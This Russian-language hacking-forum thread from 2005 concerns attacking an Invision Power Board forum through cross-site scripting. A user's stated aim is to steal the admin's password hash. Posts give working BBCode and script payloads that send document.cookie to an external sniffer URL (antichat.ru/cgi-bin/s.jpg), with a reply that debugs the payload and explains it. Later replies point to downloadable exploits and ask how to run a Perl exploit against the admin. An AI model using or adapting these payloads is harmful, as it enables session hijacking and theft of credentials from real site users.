Вопрос про проведению атаки класса XSS, в форуме Invison Power Board

Discussion in 'Песочница' started by badboy, 31 May 2005.

  1. badboy

    badboy Banned

    Joined:
    14 Mar 2005
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    НАРОД СРОЧНО ПОМОГИТЕ!!!КОРОЧЕ НАШЁЛ ФОРУМ Invison Power Board.

    Когда в приватном сообщении отправляю :

    [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:alert()) [/COLOR]

    То при прочтении это письма выбрасывается окошко,где ничего не написано.

    Когда вставлю :

    [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) [/COLOR]


    То при прочтении его,ничего в письме не написано,а в логах античата написан IP,но не мой,но моей страны,а так же ничего больше не написано в логах :

    [Tue May 31 17:39:19 2005] IP=62.148.156.202 SITE=
    REFERER=
    QUERY=
    AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Opera 7.54u1 [en]

    Вот такое сообщение.Пожалуйста напишите как преобразовать,чтоб заполучить хэш.Тоесть что добавить или чё делать,чтоб при отправке кода админу,я бы получил в логах снифера хэш пароля.

    ПОЖАЛУЙСТА ПОМОГИТЕ!!!!!1
     
  2. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Если нет элемента (картинки) с номером 68, то не сработает ...
    попробуй
    Code:
    images[0].src=
    
     
  3. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Бля не мучайся скачай эксплойт с securitylab.ru и всё.
     
  4. badboy

    badboy Banned

    Joined:
    14 Mar 2005
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    SanyaX можешь дать мне ссылку где скачать эксплойт
     
  5. badboy

    badboy Banned

    Joined:
    14 Mar 2005
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    ЧеГевара ты что написал images[0].src= Это вместо той картинки вставить?
     
  6. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Все изображения в хтмл-документе представляются через массив images, который в свою очередь является свойством document-объекта. Изображение получает номер, так принято, что первое изображение получает 0, второе 1, третье 2 и т.д.

    В примере взятом с http://antichat.ru/sniff/
    HTML:
    <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
    
    Создается новый Image-объект с именем img ... Затем определяется адрес изображения, представляемое через обект img ( а src - обязательный атрибут, указывающий URL рисунка (с) справочник =)) + через cgi-запрос передается содержавние cookies для текущего документа ...
    Ситуация с твоим примером аналогична, за исключением лишь того факта, что используется уже существующий Image-объект ... Но если он не будет найден на странице, то это вызовет ошибку ...
     
  7. Grrl

    Grrl Elder - Старейшина

    Joined:
    17 Jul 2004
    Messages:
    180
    Likes Received:
    54
    Reputations:
    29
  8. Loo

    Loo New Member

    Joined:
    1 Jun 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Grrl
    извини... а мона тупой вопрос?? а как кмопилировать сплойт?? где взять прогу или что вообще как, можешь объяснить?? плиз..
     
  9. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    Перл это не компилируемый язык,а интерпретируемый.
     
  10. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    специалисты утверждают что вопреки расхожему мнению, перл - компилируемый
    (не придираясь к словам, а так, в кач-ве интересного факта)
     
  11. Loo

    Loo New Member

    Joined:
    1 Jun 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    qBiN
    ээ... ну а как запустить то этот сплойт???

    ну млин... =( объясните, как запустить данный сплойт, чтобы получить хэш админа..
     
    #11 Loo, 2 Jun 2005
    Last edited: 2 Jun 2005
Loading...
Similar Threads - Вопрос проведению атаки
  1. gilo20
    Replies:
    2
    Views:
    2,626
  2. Dobi768
    Replies:
    2
    Views:
    2,505
  3. avva99on
    Replies:
    0
    Views:
    2,485